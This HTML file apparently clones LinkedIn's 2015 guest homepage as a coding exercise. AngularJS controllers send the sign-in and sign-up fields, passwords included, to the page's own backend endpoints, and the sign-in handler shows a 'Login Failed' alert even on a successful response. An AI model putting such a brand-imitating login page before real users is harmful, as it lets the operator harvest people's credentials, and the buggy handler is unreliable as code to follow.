<!DOCTYPE html>
<html lang="en" class="os-win" >
<head>
 <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular-resource.min.js">
    </script>
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular-route.min.js">
   </script>
    <script src="https://cdn.firebase.com/js/client/2.0.4/firebase.js"></script>
    <script src="https://cdn.firebase.com/libs/angularfire/0.9.0/angularfire.min.js"></script>
<script src="https://static.licdn.com:443/scds/common/u/lib/fizzy/fz-1.3.8-min.js" type="text/javascript"></script><script type="text/javascript">fs.config({"failureRedirect":"http://www.linkedin.com/","uniEscape":true,"xhrHeaders":{"X-FS-Origin-Request":"/nhome/","X-FS-Page-Id":"nmp-home"}});</script>

<meta name="globalTrackingUrl" content="//www.linkedin.com/mob/tracking">
<meta name="globalTrackingAppName" content="nhome">
<meta name="globalTrackingAppId" content="webTracking">
<meta name="lnkd-track-json-lib" content="https://static.licdn.com/scds/concat/common/js?h=2jds9coeh4w78ed9wblscv68v-ebbt2vixcc5qz0otts5io08xv&amp;fc=1">
<meta name="lnkd-track-lib" content="https://static.licdn.com/scds/concat/common/js?h=ebbt2vixcc5qz0otts5io08xv&amp;fc=1">
<meta name="treeID" content="2pXe/XSHxRMA1BoYLSsAAA==">
<meta name="appName" content="nhome">
<meta name="lnkd-track-error" content="/lite/ua/error?csrfToken=ajax%3A8856460781158467999">
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=7vr4nuab43rzvy2pgq7yvvxjk-4yhpyv3p9r574wkkbe8kcd2ou&amp;fc=1"></script>
<script type="text/javascript">document.cookie='lang="v=2&lang=en-us&c="; domain=linkedin.com; version=0; path=/;';</script>
<title>World&#39;s Largest Professional Network | LinkedIn</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="pageKey" content="guest-home"/>
<link rel="apple-touch-icon-precomposed" href="https://static.licdn.com/scds/common/u/img/icon/apple-touch-icon.png">
<link rel="icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico">
<meta name="msapplication-TileImage" content="https://static.licdn.com/scds/common/u/images/logos/linkedin/logo-in-win8-tile-144_v1.png"/>
<meta name="msapplication-TileColor" content="#0077B5"/>
<meta name="application-name" content="LinkedIn"/>



<link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=765zh9odycznutep5f0mj07m4-38so5ftc5lv2bbm0jf5rvv1qj-7mxyksftlcjzimz2r05hd289r-4uu2pkz5u0jch61r2nhpyyrn8-dxl1g2k3wk6qpss8oq9lwul9c-7poavrvxlvh0irzkbnoyoginp-4om4nn3a2z730xs82d78xj3be-mea0xb6thaagfbcx9i1vg82z-ct4kfyj4tquup0bvqhttvymms-3pwwsn1udmwoy3iort8vfmygt&amp;fc=1">

<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=3nuvxgwg15rbghxm1gpzfbya2-35e6ug1j754avohmn1bzmucat-mv3v66b8q0h1hvgvd3yfjv5f-14k913qahq3mh0ac0lh0twk9v-dfoaudjrk6rbf82f45bz5crwi-e9rsfv7b5gx0bk0tln31dx3sq-b88qxy99s08xoes3weacd08uc-di2107u61yb11ttimo0s2qyh2-3hnrwiauh2azwtx70po4t4dlr-8zc7dy7k0uqxxso1zmcx40mxo-a7br995b5xb4ztral63cjods4-1j5yeidfdiltik0gx4ekvcwvk-9wkskbn6s2q25rkbrnuwlqric-4zslye83akez5s4mf91hrq425-95d8d303rtd0n9wj4dcjbnh2c&amp;fc=1"></script>


<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=25kaepc6rgo1820ap1rglmzr4-c19zsujfl1pg46iqy33ubhqc5-c5ebkkd7pexovk435l30l1dq5-ascppxxu6dqpt5sppka77kdt0-8ux0lklo90tb28s8gfw2ojhzb-5n5dp3pn32p4zstdag5cbpr1-eehwe5piqwg4elnl8jvj9vpx&amp;fc=1"></script>




<link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=3j7af0ffcqjhjiv86qk3c2a18-8k6r9c0fn6s2zy3aofnyobher-71y9b1g6lawr8hhk9tooooxrs-600iu0p7wxo1ubh61afeueql4-npu3qknrq9dxl9o7lthiox77&amp;fc=1">

</head>



<body dir="ltr" class="guest v2 new-ghome login-in-header chrome-v5 chrome-v5-responsive sticky-bg guest" id="pagekey-guest-home" data-ng-app='linkedin'>

<div data-ng-controller="signinFunction">
<div id="header">
<div class="container">
<h1><img src="https://static.licdn.com/scds/common/u/img/logos/logo_132x32_2.png" alt="LinkedIn" class="logo" height="32" width="132"></h1>
<p class="textad"></p>
<div class="login">
	<fieldset>
<legend>Sign In</legend>
<ul>
<li>
<label for="session_key-login">Email address</label>
<div class="fieldgroup">
<span class="error" id="session_key-login-error"></span>
<input type="text" name="session_key" value="" id="session_key-login" data-ng-model="session_key" autofocus tabindex="1" size="27" data-ime-mode-disabled>
</div>
</li>
<li>
<label for="session_password-login">Password</label>
<a href="link to navigate to change password" class="forgot-pwd" tabindex="4">Forgot your password?</a>
<div class="fieldgroup">
<span class="error" id="session_password-login-error"></span>
<input type="password" name="session_password" value="" id="session_password-login" data-ng-model="session_password" tabindex="2" size="27">
</div>
</li>
<li class="button">
<input type="button" name="signin" value="Sign In" data-ng-model="signin" id="signin" tabindex="3" class="btn-secondary" data-ng-click="signin()">
</li>
</ul>


</fieldset>

</div>
</div>
</div>
</div>




<div id="main-wrapper">
<div id="main">
<div id="global-error">
</div>
<header>
<div id="content">
<h2><span class="text-gradient"></span><span class="headline">
Connect, share ideas, and discover opportunities.
</span></h2>
</div>
</header>
<section>
<div class="two-row-image">
<img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_1_150x150_v1.png" width="150" height="150" alt="Male Headshot">
<img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_2_150x150_v1.png" width="150" height="150" alt="Female Headshot">
<img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_3_150x150_v1.png" width="150" height="150" alt="Male Headshot">
<img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_4_150x150_v1.png" width="150" height="150" alt="Female Headshot">
<img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_5_150x150_v1.png" width="150" height="150" alt="Male Headshot">
<img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_6_150x150_v1.png" width="150" height="150" alt="Male Headshot">
</div>
</section>



<section>
<div data-ng-controller="signupFunction">
<div class="leo-module mod-feat jointoday" id="module-id3">
<div class="header"><h2>Get started &ndash; it&rsquo;s free.</h2></div>
<div class="content">
<p>Registration takes less than 2 minutes.</p>
<form action="/nhome/join-create" method="POST" name="coldRegistrationForm" novalidate="novalidate" class="feature" data-jsenabled="check" id="guest-home-reg-form">
<input type="hidden" name="isJsEnabled" value="false"/>
<fieldset>
<legend>Sign Up</legend>
<ul>
<li id="first-name">
<label for="firstName-coldRegistrationForm">First name</label>
<script id="control-http-12209-exec-245030-3" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245030-3','GhostLabel',{});</script>
<span class="error" id="firstName-coldRegistrationForm-error"></span>
<div class="fieldgroup">
<input type="text" name="firstName" data-ng-model="firstName" value="" id="firstName-coldRegistrationForm" autocomplete="on" size="55" maxlength="20" tabindex="5">
</div>
</li>
<li id="last-name">
<label for="lastName-coldRegistrationForm">Last name</label>
<script id="control-http-12209-exec-245031-4" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245031-4','GhostLabel',{});</script>
<span class="error" id="lastName-coldRegistrationForm-error"></span>
<div class="fieldgroup">
<input type="text" name="lastName" data-ng-model="lastName" value="" id="lastName-coldRegistrationForm" autocomplete="on" size="55" maxlength="40" tabindex="6">
</div>
</li>
<li id="email-address">
<label for="email-coldRegistrationForm">Email address</label>
<script id="control-http-12209-exec-245031-5" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245031-5','GhostLabel',{});</script>
<span class="error" id="email-coldRegistrationForm-error"></span>
<div class="fieldgroup">
<input type="email" name="email" data-ng-model="email" value="" id="email-coldRegistrationForm" type="email" autocomplete="on" size="55" maxlength="128" tabindex="7" data-ime-mode-disabled>
</div>
</li>
<li id="password">
<label for="password-coldRegistrationForm">Password (6 or more characters)</label>
<script id="control-http-12209-exec-245031-6" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245031-6','GhostLabel',{});</script>
<span class="error" id="password-coldRegistrationForm-error"></span>
<div class="fieldgroup">
<input type="password" name="password" data-ng-model="password" value="" id="password-coldRegistrationForm" tabindex="8">
</div>
</li>
</ul>
<input type="hidden" name="trk" value="guest_home_login"/>
<div class="form-bottom-row">
<p class="policy">
By clicking Join Now, you agree to LinkedIn's <a href="#">User Agreement</a>, <a href="#">Privacy Policy</a> and <a href="#">Cookie Policy</a>.
</p>
<p class="action">
<input type="button" name="signup" data-ng-model="signup" data-ng-click="signup()" value="Join now" id="btn-submit" class="btn-action" tabindex="9">
</p>
</div>
</fieldset>
</form>
<script id="control-http-12209-exec-245031-7" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245031-7','RegisterForm',{});</script>

</div>
</div>
</div>
</section>
</div>
</div>

<script>
   var linkedin = angular.module('linkedin', []);
   
 			 linkedin.controller( 'signinFunction', function signin($scope,$http,$location){
  			 console.log("we are in signin linkedin");
   				
   				$scope.signin = function(){ $http({
   				method: 'POST',
	            url: '/createUser/signin',
	            data: { "emailid": $scope.session_key, "password": $scope.session_password }
	           		
	           		}).success(function(response){
	           
	            alert("Login Failed");
	            
	            if(response.user == "valid"){
	           		window.location = '/successLogin';}
	            else
	            {
	            	window.location = '/failLogin';}
	        }).error(function(error){
	        console.log("we are in error!!");
	            alert("Login Failed!!");
	        });   		
 			}
 			});
 			
 			linkedin.controller('signupFunction', function signup($scope,$http,$location){ 
			console.log("We are in signup controller");
			$scope.signup = function(){$http({
   				method: 'POST',
	            url: '/createUser/signup',
	            data: { "firstName": $scope.firstName, "lastName": $scope.lastName, "email":$scope.email, "password":$scope.password }
	           		
	           		}).success(function(response){
	            
	            if(response.user == "created")
	           		window.location = '/successLogin';
	            else
	            	window.location = '/failLogin';
	        }).error(function(error){
	        console.log("we are in error!!");
	            alert("error");
	        });   		
			}
			}); 
 </script>

	


<footer id="guestfooter">
<div id="ghome-footer">
<div id="search-browse">
<div id="search">
<form name="searchForm" action="Link for search" method="get">
<h3>Find a colleague:</h3>
<ul>
<li>
<label for="first">First name</label>
<script id="control-http-12209-exec-245032-8" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245032-8','GhostLabel',{});</script>
<input type="text" name="first" id="first" size="185"/>
</li>
<li>
<label for="last">Last name</label>
<script id="control-http-12209-exec-245032-9" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245032-9','GhostLabel',{});</script>
<input type="text" name="last" id="last" size="185"/>
</li>
</ul>
<p class="action"><input class="btn-secondary" type="submit" name="search" value="Search"/></p>
</form>
</div>
<div id="directory" class="us">
<h3>
LinkedIn member directory:
</h3>
<ol type="a" class="primary">
<li>
<a href="#">a</a>
</li>
<li>
<a href="#">b</a>
</li>
<li>
<a href="#">c</a>
</li>
<li>
<a href="#">d</a>
</li>
<li>
<a href="#">e</a>
</li>
<li>
<a href="#">f</a>
</li>
<li>
<a href="#">g</a>
</li>
<li>
<a href="#">h</a>
</li>
<li>
<a href="#">i</a>
</li>
<li>
<a href="#">j</a>
</li>
<li>
<a href="#">k</a>
</li>
<li>
<a href="#">l</a>
</li>
<li>
<a href="#">m</a>
</li>
<li>
<a href="#">n</a>
</li>
<li>
<a href="#">o</a>
</li>
<li>
<a href="#">p</a>
</li>
<li>
<a href="#">q</a>
</li>
<li>
<a href="#">r</a>
</li>
<li>
<a href="#">s</a>
</li>
<li>
<a href="#">t</a>
</li>
<li>
<a href="#">u</a>
</li>
<li>
<a href="#">v</a>
</li>
<li>
<a href="#">w</a>
</li>
<li>
<a href="#">x</a>
</li>
<li>
<a href="#">y</a>
</li>
<li>
<a href="#">z</a>
</li>
<li>
<a href="#" class="callout-trigger nlcl-hovercard-trigger">more</a>
</li>
<li class="country-search">
Browse members <a href="Provide a link to display members by aphabates ">by country</a>
</li>
</ol>
</div>


<script type="text/javascript">fs._server.fire("da95defd7487c51300d41a182d2b0000-1",{event:"before",type:"html"});</script>
<div id="footer" class="remote-nav">
<div class="wrapper">
<ul class="nav-footer">
<li><a href="#">Sign up</a></li>
<li>
<a href="#" target="_blank" rel="nofollow" class="cust-svc-link">Help Center</a>
</li>
<li id="li-about">
<a id="li-about-trigger" href="#">About</a>
<ul id="li-about-options">
<li><a href="#" target="_blank">Press</a></li>
<li><a href="#" target="_blank">Blog</a></li>
<li><a href="#" target="_blank">Developers</a></li>
</ul>
</li>
<li><a href="#">Careers</a></li>
<li><a href="#">Advertising</a></li>
<li><a href="#" target="_blank">Talent Solutions</a></li>
<li><a href="#" target="_blank">Sales Solutions</a></li>
<li><a href="#" target="_blank">Small Business</a></li>
<li><a href="#" target="_blank">Mobile</a></li>
<li><a href="#" target="_blank">Language</a></li>
<li class="last"><a href="#" target="_blank">SlideShare</a></li>
</ul>

<nav role="navigation" aria-label="Footer Directory Menu">
<ul class="nav-footer li-links" role="menubar">
<li role="menuitem"><a href="#">LinkedIn Updates</a>
</li>
<li role="menuitem"><a href="#">LinkedIn Influencers</a>
</li>
<li role="menuitem"><a href="#">LinkedIn Jobs</a>
</li>
</ul>
<ul class="nav-footer directories" role="menubar">
<li>Directories</li>
<li role="menuitem"><a href="#">Members</a>
</li>
<li role="menuitem"><a href="#">Jobs</a>
</li>
<li role="menuitem"><a href="#">Pulse</a>
</li>
<li role="menuitem"><a href="#">Companies</a>
</li>
<li role="menuitem"><a href="#">Groups</a>
</li>
<li role="menuitem"><a href="#">Universities</a>
</li>
<li class="last" role="menuitem"><a href="#">Titles</a>
</li>
</ul>
</nav>


<p id="copyright" class="guest"><span>LinkedIn Corporation</span> <em>&copy; 2015</em></p>
<ul id="nav-legal">	
<li><a href="#">User Agreement</a></li>
<li><a href="#">Privacy Policy</a></li>
<li>
<a href="" target="_blank" rel="nofollow">Community Guidelines</a>
</li>
<li><a href="#">Cookie Policy</a></li>
<li><a href="#">Copyright Policy</a></li>
<li><a href="#" rel="nofollow">Guest Controls</a></li>
</ul>
</div>
</div>


















</body>
</html>